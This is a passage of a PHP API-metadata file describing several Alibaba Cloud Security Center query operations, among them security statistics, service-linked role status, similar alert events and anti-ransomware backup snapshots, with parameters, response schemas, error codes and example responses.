Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A3E61730-85E2-4789-8017-B9B1B70F0568', 'title' => ''], 'SecurityEvent' => [ 'description' => 'The statistics of pending security alerts.', 'type' => 'object', 'properties' => [ 'SuspiciousCount' => ['description' => 'The number of alerts with the **Suspicious** severity level on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '148', 'title' => ''], 'SeriousCount' => ['description' => 'The number of alerts with the **Urgent** severity level on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '404', 'title' => ''], 'RemindCount' => ['description' => 'The number of alerts with the **Reminder** severity level detected on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'TotalCount' => ['description' => 'The total number of pending alerts on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '552', 'title' => ''], 'ValueArray' => [ 'description' => 'The collection of pending alert counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of pending alerts at a statistical time point.', 'type' => 'string', 'example' => '444', 'title' => ''], 'title' => '', 'example' => '', ], 'TimeArray' => [ 'description' => 'The collection of statistical time periods for alerts.', 'type' => 'array', 'items' => ['description' => 'The statistical time period for alerts.', 'type' => 'string', 'example' => '1641484800000', 'title' => ''], 'title' => '', 'example' => '', ], 'RemindList' => [ 'description' => 'The collection of Reminder-level alert counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of alerts with the **Reminder** severity level at a statistical time point.', 'type' => 'string', 'example' => '5,', 'title' => ''], 'title' => '', 'example' => '', ], 'LevelsOn' => [ 'description' => 'The collection of alert severity levels included in the statistics for pending alerts.', 'type' => 'array', 'items' => ['description' => 'The alert severity level included in the statistics for pending alerts. Valid values:'."\n" .'- **remind**: Reminder'."\n" .'- **suspicious**: Suspicious'."\n" .'- **serious**: Urgent.', 'type' => 'string', 'example' => 'remind', 'title' => ''], 'title' => '', 'example' => '', ], 'DateArray' => [ 'description' => 'The collection of statistical time points in the pending alert trend chart.', 'type' => 'array', 'items' => ['description' => 'The statistical time point in the pending alert trend chart.', 'type' => 'string', 'example' => '2020-01-08', 'title' => ''], 'title' => '', 'example' => '', ], 'SuspiciousList' => [ 'description' => 'The collection of Suspicious-level alert counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of alerts with the **Suspicious** severity level at a statistical time point.', 'type' => 'string', 'example' => '111,', 'title' => ''], 'title' => '', 'example' => '', ], 'SeriousList' => [ 'description' => 'The collection of Urgent-level alert counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of alerts with the **Urgent** severity level at a statistical time point.', 'type' => 'string', 'example' => '111', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'AttackEvent' => [ 'description' => 'The statistics of attack events.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The number of attacks on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '1096', 'title' => ''], 'DateArray' => [ 'description' => 'The collection of statistical time points in the attack count trend chart.', 'type' => 'array', 'items' => ['description' => 'The statistical time point in the attack count trend chart.', 'type' => 'string', 'example' => '2020-01-04', 'title' => ''], 'title' => '', 'example' => '', ], 'ValueArray' => [ 'description' => 'The collection of attack counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of attacks at a statistical time point.', 'type' => 'string', 'example' => '2620', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'HealthCheck' => [ 'description' => 'The statistics of baseline issues.', 'type' => 'object', 'properties' => [ 'HighCount' => ['description' => 'The number of high-risk baseline issues on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'LowCount' => ['description' => 'The number of low-risk baseline issues on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'TotalCount' => ['description' => 'The total number of baseline issues on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '32', 'title' => ''], 'MediumCount' => ['description' => 'The number of medium-risk baseline issues on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '21', 'title' => ''], 'ValueArray' => [ 'description' => 'The collection of total baseline counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The total number of baselines at a statistical time point.', 'type' => 'string', 'example' => '31', 'title' => ''], 'title' => '', 'example' => '', ], 'TimeArray' => [ 'description' => 'The collection of statistical time periods for baselines.', 'type' => 'array', 'items' => ['description' => 'The statistical time period for baselines.', 'type' => 'string', 'example' => '1641484800000', 'title' => ''], 'title' => '', 'example' => '', ], 'LevelsOn' => [ 'description' => 'The collection of baseline risk levels included in the statistics.', 'type' => 'array', 'items' => ['description' => 'The baseline risk level included in the statistics. Valid values:'."\n" .'- **high**: high risk'."\n" .'- **medium**: medium risk'."\n" .'- **low**: low risk.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'title' => '', 'example' => '', ], 'LowList' => [ 'description' => 'The collection of low-risk baseline issue counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of low-risk baseline issues at a statistical time point.', 'type' => 'string', 'example' => '0', 'title' => ''], 'title' => '', 'example' => '', ], 'MediumList' => [ 'description' => 'The collection of medium-risk baseline issue counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of medium-risk baseline issues at a statistical time point.', 'type' => 'string', 'example' => '0', 'title' => ''], 'title' => '', 'example' => '', ], 'DateArray' => [ 'description' => 'The collection of statistical time points in the baseline issue trend chart.', 'type' => 'array', 'items' => ['description' => 'The statistical time point in the baseline issue trend chart.', 'type' => 'string', 'example' => '2020-01-04', 'title' => ''], 'title' => '', 'example' => '', ], 'HighList' => [ 'description' => 'The collection of high-risk baseline counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of high-risk baselines at a statistical time point.', 'type' => 'string', 'example' => '11', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Vulnerability' => [ 'description' => 'The statistics information of unfixed vulnerabilities.', 'type' => 'object', 'properties' => [ 'NntfCount' => ['description' => 'The number of unfixed vulnerabilities with **low** priority on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'LaterCount' => ['description' => 'The number of unfixed vulnerabilities with **medium** priority on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '275', 'title' => ''], 'TotalCount' => ['description' => 'The number of unfixed vulnerabilities on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '384', 'title' => ''], 'AsapCount' => ['description' => 'The number of unfixed vulnerabilities with **high** priority on the current day.', 'type' => 'integer', 'format' => 'int32', 'example' => '109', 'title' => ''], 'NntfList' => [ 'description' => 'The collection of low-priority unfixed vulnerability counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of unfixed vulnerabilities with **low** priority at a statistical time point.', 'type' => 'string', 'example' => '0', 'title' => ''], 'title' => '', 'example' => '', ], 'AsapList' => [ 'description' => 'The collection of high-priority unfixed vulnerability counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of unfixed vulnerabilities with **high** priority at a statistical time point.', 'type' => 'string', 'example' => '60', 'title' => ''], 'title' => '', 'example' => '', ], 'ValueArray' => [ 'description' => 'The collection of unfixed vulnerability counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of unfixed vulnerabilities at a statistical time point.', 'type' => 'string', 'example' => '384', 'title' => ''], 'title' => '', 'example' => '', ], 'TimeArray' => [ 'description' => 'The collection of statistical time periods for unfixed vulnerabilities.', 'type' => 'array', 'items' => ['description' => 'The statistical time period for unfixed vulnerabilities.', 'type' => 'string', 'example' => '1641484800000', 'title' => ''], 'title' => '', 'example' => '', ], 'LevelsOn' => [ 'description' => 'The collection of vulnerability priority levels included in the statistics for unfixed vulnerabilities.', 'type' => 'array', 'items' => ['description' => 'The vulnerability priority level included in the statistics for unfixed vulnerabilities. Valid values:'."\n" .'- **asap**: high'."\n" .'- **later**: medium'."\n" .'- **nntf**: low.', 'type' => 'string', 'example' => 'later', 'title' => ''], 'title' => '', 'example' => '', ], 'LaterList' => [ 'description' => 'The collection of medium-priority unfixed vulnerability counts at each statistical time point.', 'type' => 'array', 'items' => ['description' => 'The number of unfixed vulnerabilities with **medium** priority at a statistical time point.', 'type' => 'string', 'example' => '275', 'title' => ''], 'title' => '', 'example' => '', ], 'DateArray' => [ 'description' => 'The collection of statistical time points in the unfixed vulnerability trend chart.', 'type' => 'array', 'items' => ['description' => 'The statistical time point in the unfixed vulnerability trend chart.', 'type' => 'string', 'example' => '2020-01-04', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query statistics and trend data of security check items', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityStatInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSecurityStatInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"A3E61730-85E2-4789-8017-B9B1B70F0568\\",\\n \\"SecurityEvent\\": {\\n \\"SuspiciousCount\\": 148,\\n \\"SeriousCount\\": 404,\\n \\"RemindCount\\": 0,\\n \\"TotalCount\\": 552,\\n \\"ValueArray\\": [\\n \\"444\\"\\n ],\\n \\"TimeArray\\": [\\n \\"1641484800000\\"\\n ],\\n \\"RemindList\\": [\\n \\"5,\\"\\n ],\\n \\"LevelsOn\\": [\\n \\"remind\\"\\n ],\\n \\"DateArray\\": [\\n \\"2020-01-08\\"\\n ],\\n \\"SuspiciousList\\": [\\n \\"111,\\"\\n ],\\n \\"SeriousList\\": [\\n \\"111\\"\\n ]\\n },\\n \\"AttackEvent\\": {\\n \\"TotalCount\\": 1096,\\n \\"DateArray\\": [\\n \\"2020-01-04\\"\\n ],\\n \\"ValueArray\\": [\\n \\"2620\\"\\n ]\\n },\\n \\"HealthCheck\\": {\\n \\"HighCount\\": 10,\\n \\"LowCount\\": 0,\\n \\"TotalCount\\": 32,\\n \\"MediumCount\\": 21,\\n \\"ValueArray\\": [\\n \\"31\\"\\n ],\\n \\"TimeArray\\": [\\n \\"1641484800000\\"\\n ],\\n \\"LevelsOn\\": [\\n \\"high\\"\\n ],\\n \\"LowList\\": [\\n \\"0\\"\\n ],\\n \\"MediumList\\": [\\n \\"0\\"\\n ],\\n \\"DateArray\\": [\\n \\"2020-01-04\\"\\n ],\\n \\"HighList\\": [\\n \\"11\\"\\n ]\\n },\\n \\"Vulnerability\\": {\\n \\"NntfCount\\": 0,\\n \\"LaterCount\\": 275,\\n \\"TotalCount\\": 384,\\n \\"AsapCount\\": 109,\\n \\"NntfList\\": [\\n \\"0\\"\\n ],\\n \\"AsapList\\": [\\n \\"60\\"\\n ],\\n \\"ValueArray\\": [\\n \\"384\\"\\n ],\\n \\"TimeArray\\": [\\n \\"1641484800000\\"\\n ],\\n \\"LevelsOn\\": [\\n \\"later\\"\\n ],\\n \\"LaterList\\": [\\n \\"275\\"\\n ],\\n \\"DateArray\\": [\\n \\"2020-01-04\\"\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeServiceLinkedRoleStatus' => [ 'summary' => 'Checks whether a service-linked role is created for Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ServiceLinkedRole', 'in' => 'query', 'schema' => ['description' => 'The service-linked role. Default value: **AliyunServiceRoleForSas**. Valid values:'."\n" ."\n" .'* **AliyunServiceRoleForSas**: the service-linked role of Security Center. Security Center assumes this role to access the resources of other cloud services within your account.'."\n" .'* **AliyunServiceRoleForSasCspm**: the service-linked role of Security Center-CSPM. Security Center-CSPM assumes this role to access the resources of other cloud services within your account.'."\n", 'type' => 'string', 'required' => false, 'example' => 'AliyunServiceRoleForSas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '39CE98F4-88C0-4539-B906-6B542E5C07B9', 'title' => ''], 'RoleStatus' => [ 'description' => 'The status information about the service-linked role.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'Indicates whether the service-linked role is created. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"39CE98F4-88C0-4539-B906-6B542E5C07B9\\",\\n \\"RoleStatus\\": {\\n \\"Status\\": true\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n 39CE98F4-88C0-4539-B906-6B542E5C07B9\\n \\n true\\n \\n","errorExample":""}]', 'title' => 'DescribeServiceLinkedRoleStatus', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeServiceLinkedRoleStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeServiceLinkedRoleStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSimilarEventScenarios' => [ 'summary' => 'Queries the handling scenarios for alerts triggered by the same rule or type.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '112.214.XX.XX', 'title' => ''], ], [ 'name' => 'SecurityEventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event.'."\n" .'>You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '12321', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'FDF7B8D9-8493-4B90-8D13-E0C1FFCE5F97', 'title' => ''], 'Scenarios' => [ 'description' => 'The list of handling scenarios for alerts of the same type.', 'type' => 'array', 'items' => [ 'description' => 'The handling scenario for alerts of the same type.', 'type' => 'object', 'properties' => [ 'Code' => ['description' => 'The code of the handling scenario. Valid values:'."\n" .'- **default**: same alerting type'."\n" .'- **same_file_content**: same file content rule'."\n" .'- **same_ip**: same IP rule'."\n" .'- **same_url**: same URL rule.', 'type' => 'string', 'example' => 'same_url', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'SecurityEventNotExists', 'errorMessage' => 'Security event not exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query handling scenarios for alerts with the same trigger', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSimilarEventScenarios'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSimilarEventScenarios', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FDF7B8D9-8493-4B90-8D13-E0C1FFCE5F97\\",\\n \\"Scenarios\\": [\\n {\\n \\"Code\\": \\"same_url\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeSimilarSecurityEvents' => [ 'summary' => 'Queries alert events that are triggered by the same rule or of the same alert type.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The task ID. You can call the [CreateSimilarSecurityEventsQueryTask](~~CreateSimilarSecurityEventsQueryTask~~) operation to obtain the task ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1689135', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '9F4217C8-763F-51EF-84D4-5535E072B2D8', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], 'SecurityEventsResponse' => [ 'description' => 'The information about the alert events that are triggered by the same rule or of the same alert type.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'LastTime' => ['description' => 'The timestamp generated when the alert event was last detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1648544361480', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server that was affected by the alert event.'."\n", 'type' => 'string', 'example' => 'qweeqq-13232-daweq-w****', 'title' => ''], 'EventName' => ['description' => 'The name of the alert event.'."\n", 'type' => 'string', 'example' => 'Trojan', 'title' => ''], 'EventType' => ['description' => 'The type of the alert event. Valid values:'."\n" ."\n" .'* Suspicious Process'."\n" .'* Webshell'."\n" .'* Unusual Logon'."\n" .'* Malicious Software'."\n" .'* Sensitive File Tampering'."\n" .'* Unusual Network Connection'."\n" .'* Other'."\n" .'* Suspicious Account'."\n" .'* Cloud threat detection'."\n" .'* Precision defense'."\n" .'* Application Whitelist'."\n" .'* Persistence'."\n" .'* Web Application Threat Detection'."\n" .'* Malicious scripts'."\n" .'* Malicious Network Activity'."\n" .'* K8s Abnormal Behavior'."\n" .'* Website backdoor (local engine)'."\n" .'* Exploit'."\n" .'* Image Scan'."\n" .'* Trusted exception'."\n" ."\n" .'For more information about alert types, see [Overview](~~68388~~).'."\n", 'type' => 'string', 'example' => 'Malicious Software', 'title' => ''], 'SecurityEventId' => ['description' => 'The ID of the alert event.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '158661', 'title' => ''], 'OccurrenceTime' => ['description' => 'The timestamp generated when the alert event was first detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1648457961000', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'OperationTaskNotExists', 'errorMessage' => 'The specified operation task does not exist', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"9F4217C8-763F-51EF-84D4-5535E072B2D8\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 5,\\n \\"Count\\": 5\\n },\\n \\"SecurityEventsResponse\\": [\\n {\\n \\"LastTime\\": 1648544361480,\\n \\"Uuid\\": \\"qweeqq-13232-daweq-w****\\",\\n \\"EventName\\": \\"Trojan\\",\\n \\"EventType\\": \\"Malicious Software\\",\\n \\"SecurityEventId\\": 158661,\\n \\"OccurrenceTime\\": 1648457961000\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"","errorExample":""}]', 'title' => 'DescribeSimilarSecurityEvents', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSimilarSecurityEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSimilarSecurityEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSnapshots' => [ 'summary' => 'Queries the backup snapshots that are created for anti-ransomware.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeBackupPolicy](~~DescribeBackupPolicy~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => '061d8042-59ff-416e-bc33-294a1cf5****', 'title' => ''], ], [ 'name' => 'MachineRegion', 'in' => 'query', 'schema' => ['description' => 'The region in which the server resides.'."\n" ."\n" .'> If the Uuid parameter is not specified, this parameter is required.'."\n", 'type' => 'string', 'required' => false, 'example' => 'us-east-1', 'title' => ''], ], [ 'name' => 'MachineRemark', 'in' => 'query', 'schema' => ['description' => 'The name or IP address of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'schema' => ['description' => 'The status of backup snapshots from which data can be restored. Valid values:'."\n" ."\n" .'* **COMPLETE**: complete'."\n" .'* **PARTIAL_COMPLETE**: partial complete'."\n", 'type' => 'string', 'required' => false, 'example' => '["COMPLETE"]', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The starting position of the query. If this parameter is left empty, the query starts from the beginning.'."\n" ."\n" .'> If you call the operation for the first time, you do not need to specify the parameter. The response to the first call contains the token that can be used for the second call. Each subsequent response contains the token that can be used for the next call.'."\n", 'type' => 'string', 'required' => false, 'example' => 'CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAB4SwmEAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM0NzY3YTZjNjI3NjZmNmU3MjcxNjk3NDY5MzY3MjY4****', 'title' => ''], ], [ 'name' => 'ApiVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the anti-ransomware policy. Valid values:'."\n" ."\n" .'* **1.0.0**'."\n" .'* **2.0.0**'."\n", 'type' => 'string', 'required' => true, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'IsAliYunEcs', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the server is an Elastic Compute Service (ECS) instance. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'string', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NextToken' => ['description' => 'The token that is used to initiate the next call.'."\n", 'type' => 'string', 'example' => 'CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2NDc4****', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Snapshots' => [ 'description' => 'An array that consists of the backup snapshots.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the backup snapshot.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of backup tasks. Valid values:'."\n" ."\n" .'* **COMPLETE**: complete'."\n" .'* **PARTIAL_COMPLETE**: partial complete'."\n" .'* **FAILED**: failed'."\n", 'type' => 'string', 'example' => 'COMPLETE', 'title' => ''], 'SnapshotHash' => ['description' => 'The hash value of the backup snapshot.'."\n", 'type' => 'string', 'example' => '9ee47cf12351e4ddecce8c12f4957d3946cd96fbe24cd4ab264c7200839d****', 'title' => ''], 'ActualItems' => ['description' => 'The actual number of backup objects.'."\n" ."\n" .'> This parameter is available only for file backup.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'VaultId' => ['description' => 'The ID of the backup vault that stores the backup snapshot.'."\n", 'type' => 'string', 'example' => 'v-000ccok3zmw7fbzz****', 'title' => ''], 'ActualBytes' => ['description' => 'The actual data amount of backup snapshots after duplicates are removed. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '686188****', 'title' => ''], 'SourceType' => ['description' => 'The type of the data source. Valid values:'."\n" ."\n" .'* **ECS_FILE**: ECS files'."\n" .'* **OSS**: Object Storage Service (OSS) buckets'."\n" .'* **NAS**: File Storage NAS file systems'."\n" .'* **OTS_TABLE**: Tablestore instances', 'type' => 'string', 